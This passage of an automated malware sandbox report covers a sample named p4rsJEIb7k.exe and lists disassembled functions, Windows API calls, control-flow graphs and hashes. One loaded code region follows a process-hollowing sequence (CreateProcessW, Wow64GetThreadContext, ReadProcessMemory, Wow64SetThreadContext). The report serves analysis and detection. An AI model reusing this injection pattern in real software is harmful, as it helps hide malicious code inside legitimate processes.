                                                                                                                • Instruction Fuzzy Hash: E112A4789042869FDB21DF6AC8847EA7BF0BF06304F14459FED6287292D37899C1CB59
                                                                                                                Function 00410B90 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1555 410b90-410cf1 call 425210 call 41171a GetModuleFileNameW call 413db0 call 413dfc call 413e3c call 41171a call 411691 RegOpenKeyExW 1570 429bc3-429bec RegQueryValueExW 1555->1570 1571 410cf7-410d03 1555->1571 1572 429bf2-429c18 1570->1572 1573 429cd9-429cde RegCloseKey 1570->1573 1574 429c1f-429c31 1572->1574 1575 429c33-429c37 1574->1575 1576 429c50-429c5f call 4112d5 1574->1576 1575->1576 1577 429c39-429c48 call 411663 1575->1577 1582 429c61-429c74 call 4112d5 1576->1582 1583 429c88-429cd2 call 41171a call 41326a 1576->1583 1585 429c4b-429c4e 1577->1585 1582->1583 1590 429c76-429c85 call 411663 1582->1590 1583->1585 1594 429cd8 1583->1594 1585->1574 1590->1583 1594->1573
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                • API String ID: 3617018055-2276155026
                                                                                                                • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                                Function 04549AC8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1595 4549ac8-4549b76 call 45474d8 1598 4549b7d-4549ba3 call 454a9d8 CreateFileW 1595->1598 1601 4549ba5 1598->1601 1602 4549baa-4549bba 1598->1602 1603 4549cf5-4549cf9 1601->1603 1610 4549bc1-4549bdb VirtualAlloc 1602->1610 1611 4549bbc 1602->1611 1604 4549d3b-4549d3e 1603->1604 1605 4549cfb-4549cff 1603->1605 1607 4549d41-4549d48 1604->1607 1608 4549d01-4549d04 1605->1608 1609 4549d0b-4549d0f 1605->1609 1614 4549d9d-4549db2 1607->1614 1615 4549d4a-4549d55 1607->1615 1608->1609 1616 4549d11-4549d1b 1609->1616 1617 4549d1f-4549d23 1609->1617 1612 4549be2-4549bf9 ReadFile 1610->1612 1613 4549bdd 1610->1613 1611->1603 1618 4549c00-4549c40 VirtualAlloc 1612->1618 1619 4549bfb 1612->1619 1613->1603 1622 4549db4-4549dbf VirtualFree 1614->1622 1623 4549dc2-4549dca 1614->1623 1620 4549d57 1615->1620 1621 4549d59-4549d65 1615->1621 1616->1617 1624 4549d25-4549d2f 1617->1624 1625 4549d33 1617->1625 1626 4549c47-4549c62 call 454ac28 1618->1626 1627 4549c42 1618->1627 1619->1603 1620->1614 1628 4549d67-4549d77 1621->1628 1629 4549d79-4549d85 1621->1629 1622->1623 1624->1625 1625->1604 1635 4549c6d-4549c77 1626->1635 1627->1603 1631 4549d9b 1628->1631 1632 4549d87-4549d90 1629->1632 1633 4549d92-4549d98 1629->1633 1631->1607 1632->1631 1633->1631 1636 4549c79-4549ca8 call 454ac28 1635->1636 1637 4549caa-4549cbe call 454aa38 1635->1637 1636->1635 1642 4549cc0 1637->1642 1643 4549cc2-4549cc6 1637->1643 1642->1603 1645 4549cd2-4549cd6 1643->1645 1646 4549cc8-4549ccc CloseHandle 1643->1646 1647 4549ce6-4549cef 1645->1647 1648 4549cd8-4549ce3 VirtualFree 1645->1648 1646->1645 1647->1598 1647->1603 1648->1647
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04549B99
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04549DBF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 204039940-0
                                                                                                                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                • Instruction ID: 453a3964fff1a71851e8c90c75ff83261139c531c70e295ad5b2ee7449ab46b4
                                                                                                                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                • Instruction Fuzzy Hash: 85A13BB0E00209EBDB14CFA4D885BEEB7B5FF88308F208559E505BB284D775AA40DF54
                                                                                                                Function 00401230 Relevance: 10.6, APIs: 7, Instructions: 83windowtimeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1649 401230-40123b 1650 401241-401272 call 4131f0 call 401be0 1649->1650 1651 4012c5-4012cd 1649->1651 1656 401274-401292 1650->1656 1657 4012ae-4012bf KillTimer SetTimer 1650->1657 1658 42aa61-42aa67 1656->1658 1659 401298-40129c 1656->1659 1657->1651 1662 42aa8b-42aaa7 Shell_NotifyIconW 1658->1662 1663 42aa69-42aa86 Shell_NotifyIconW 1658->1663 1660 4012a2-4012a8 1659->1660 1661 42aaac-42aab3 1659->1661 1660->1657 1664 42aaf8-42ab15 Shell_NotifyIconW 1660->1664 1665 42aad7-42aaf3 Shell_NotifyIconW 1661->1665 1666 42aab5-42aad2 Shell_NotifyIconW 1661->1666 1662->1657 1663->1657 1664->1657 1665->1657 1666->1657
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_$Timer$Kill
                                                                                                                • String ID:
                                                                                                                • API String ID: 3970887597-0
                                                                                                                • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                                • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                                • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                                                                Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1667 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                                                Function 04549888 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1668 4549888-45499c9 call 45474d8 call 4549778 CreateFileW 1675 45499d0-45499e0 1668->1675 1676 45499cb 1668->1676 1679 45499e7-4549a01 VirtualAlloc 1675->1679 1680 45499e2 1675->1680 1677 4549a80-4549a85 1676->1677 1681 4549a05-4549a1c ReadFile 1679->1681 1682 4549a03 1679->1682 1680->1677 1683 4549a20-4549a5a call 45497b8 call 4548778 1681->1683 1684 4549a1e 1681->1684 1682->1677 1689 4549a76-4549a7e ExitProcess 1683->1689 1690 4549a5c-4549a71 call 4549808 1683->1690 1684->1677 1689->1677 1690->1689
                                                                                                                APIs
                                                                                                                  • Part of subcall function 04549778: Sleep.KERNELBASE(000001F4), ref: 04549789
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 045499BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: 7STRG7XCI4F6XGQTPP92RUP6QJ
                                                                                                                • API String ID: 2694422964-3223002266
                                                                                                                • Opcode ID: 5dbb52c7ed3fff859574b6c0b283532e13fd653ad6b62c2737601a2ec968875e
                                                                                                                • Instruction ID: 0146165029b4dbd0852f379494789996d6835729389d4aab9c355cd40b2efc42
                                                                                                                • Opcode Fuzzy Hash: 5dbb52c7ed3fff859574b6c0b283532e13fd653ad6b62c2737601a2ec968875e
                                                                                                                • Instruction Fuzzy Hash: CF519270D04288DAEF11DBB4D855BEFBBB8AF55308F004199E2497B2C1D7B91B48CB66
                                                                                                                Function 00410130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1692 410130-410142 SHGetMalloc 1693 410148-410158 SHGetDesktopFolder 1692->1693 1694 42944f-429459 call 411691 1692->1694 1695 4101d1-4101e0 1693->1695 1696 41015a-410188 call 411691 1693->1696 1695->1694 1702 4101e6-4101ee 1695->1702 1704 4101c5-4101ce 1696->1704 1705 41018a-4101a1 SHGetPathFromIDListW 1696->1705 1704->1695 1706 4101a3-4101b1 call 411691 1705->1706 1707 4101b4-4101c0 1705->1707 1706->1707 1707->1704
                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                • SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DesktopFolderFromListMallocPath
                                                                                                                • String ID: C:\Users\user\Desktop\p4rsJEIb7k.exe
                                                                                                                • API String ID: 2281215042-1971492628
                                                                                                                • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                                                Function 04548778 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1714 4548778-4548818 call 454ac08 * 3 1721 454882f 1714->1721 1722 454881a-4548824 1714->1722 1724 4548836-454883f 1721->1724 1722->1721 1723 4548826-454882d 1722->1723 1723->1724 1725 4548846-4548ef8 1724->1725 1726 4548efa-4548efe 1725->1726 1727 4548f0b-4548f38 CreateProcessW 1725->1727 1728 4548f44-4548f71 1726->1728 1729 4548f00-4548f04 1726->1729 1735 4548f42 1727->1735 1736 4548f3a-4548f3d 1727->1736 1747 4548f73-4548f76 1728->1747 1748 4548f7b 1728->1748 1730 4548f06 1729->1730 1731 4548f7d-4548faa 1729->1731 1734 4548fb4-4548fce Wow64GetThreadContext 1730->1734 1731->1734 1754 4548fac-4548faf 1731->1754 1739 4548fd5-4548ff0 ReadProcessMemory 1734->1739 1740 4548fd0 1734->1740 1735->1734 1737 4549339-454933b 1736->1737 1741 4548ff7-4549000 1739->1741 1742 4548ff2 1739->1742 1744 45492e2-45492e6 1740->1744 1745 4549002-4549011 1741->1745 1746 4549029-4549048 call 454a288 1741->1746 1742->1744 1750 4549337 1744->1750 1751 45492e8-45492ec 1744->1751 1745->1746 1752 4549013-4549022 call 454a1d8 1745->1752 1765 454904f-4549072 call 454a3c8 1746->1765 1766 454904a 1746->1766 1747->1737 1748->1734 1750->1737 1755 4549301-4549305 1751->1755 1756 45492ee-45492fa 1751->1756 1752->1746 1767 4549024 1752->1767 1754->1734 1754->1737 1758 4549307-454930a 1755->1758 1759 4549311-4549315 1755->1759 1756->1755 1758->1759 1763 4549317-454931a 1759->1763 1764 4549321-4549325 1759->1764 1763->1764 1768 4549327-454932d call 454a1d8 1764->1768 1769 4549332-4549335 1764->1769 1773 4549074-454907b 1765->1773 1774 45490bc-45490dd call 454a3c8 1765->1774 1766->1744 1767->1744 1768->1769 1769->1737 1776 45490b7 1773->1776 1777 454907d-45490ae call 454a3c8 1773->1777 1781 45490e4-4549102 call 454ac28 1774->1781 1782 45490df 1774->1782 1776->1744 1783 45490b5 1777->1783 1784 45490b0 1777->1784 1787 454910d-4549117 1781->1787 1782->1744 1783->1774 1784->1744 1788 454914d-4549151 1787->1788 1789 4549119-454914b call 454ac28 1787->1789 1790 4549157-4549167 1788->1790 1791 454923c-4549259 call 4549dd8 1788->1791 1789->1787 1790->1791 1794 454916d-454917d 1790->1794 1799 4549260-454927f Wow64SetThreadContext 1791->1799 1800 454925b 1791->1800 1794->1791 1797 4549183-45491a7 1794->1797 1801 45491aa-45491ae 1797->1801 1802 4549281 1799->1802 1803 4549283-454928e call 454a108 1799->1803 1800->1744 1801->1791 1804 45491b4-45491c9 1801->1804 1802->1744 1810 4549290 1803->1810 1811 4549292-4549296 1803->1811 1806 45491dd-45491e1 1804->1806 1808 45491e3-45491ef 1806->1808 1809 454921f-4549237 1806->1809 1812 45491f1-454921b 1808->1812 1813 454921d 1808->1813 1809->1801 1810->1744 1814 45492a2-45492a6 1811->1814 1815 4549298-454929b 1811->1815 1812->1813 1813->1806 1817 45492b2-45492b6 1814->1817 1818 45492a8-45492ab 1814->1818 1815->1814 1819 45492c2-45492c6 1817->1819 1820 45492b8-45492bb 1817->1820 1818->1817 1821 45492d3-45492dc 1819->1821 1822 45492c8-45492ce call 454a1d8 1819->1822 1820->1819 1821->1725 1821->1744 1822->1821
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 04548F33
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04548FC9
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04548FEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                • Instruction ID: 2f3b4cfe8cb714f9b12a38701214f973fd358c7fd6905ce91a72678a880af507
                                                                                                                • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                • Instruction Fuzzy Hash: B9620A70A14218DBEB24CFA4D841BDEB372FF98304F1091A9D10DEB294E775AE81DB59
                                                                                                                Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1987 40f110-40f13a RegOpenKeyExW 1988 40f13c-40f159 RegQueryValueExW RegCloseKey 1987->1988 1989 40f15f-40f160 1987->1989 1988->1989
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3677997916-0
                                                                                                                • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 4e47f038e922e84c19ecab33a0164ae102939a21ade882e67390b57c38244a2e
                                                                                                                • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                                                • Opcode Fuzzy Hash: 4e47f038e922e84c19ecab33a0164ae102939a21ade882e67390b57c38244a2e
                                                                                                                • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                                                Function 00416193 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStartupInfoW.KERNEL32(?,0048C920,00000058), ref: 004161A8
                                                                                                                • GetCommandLineW.KERNEL32 ref: 0041623D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CommandInfoLineStartup
                                                                                                                • String ID:
                                                                                                                • API String ID: 582193876-0
                                                                                                                • Opcode ID: 0ff05a0656d0cabc76cd69936c9fb6d5f070ff973f57c73f94411b1fd4ca271d
                                                                                                                • Instruction ID: 4cece88e8d20870e626e2a15fe4d62767af7f5e44e91f32af7e3c33ec5ed94b3
                                                                                                                • Opcode Fuzzy Hash: 0ff05a0656d0cabc76cd69936c9fb6d5f070ff973f57c73f94411b1fd4ca271d
                                                                                                                • Instruction Fuzzy Hash: 5A31B771E40314E9DB10BBB2A9467EE2664AF1070CF1144AFF915AA2D3DBBCC9C18B5D
                                                                                                                Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
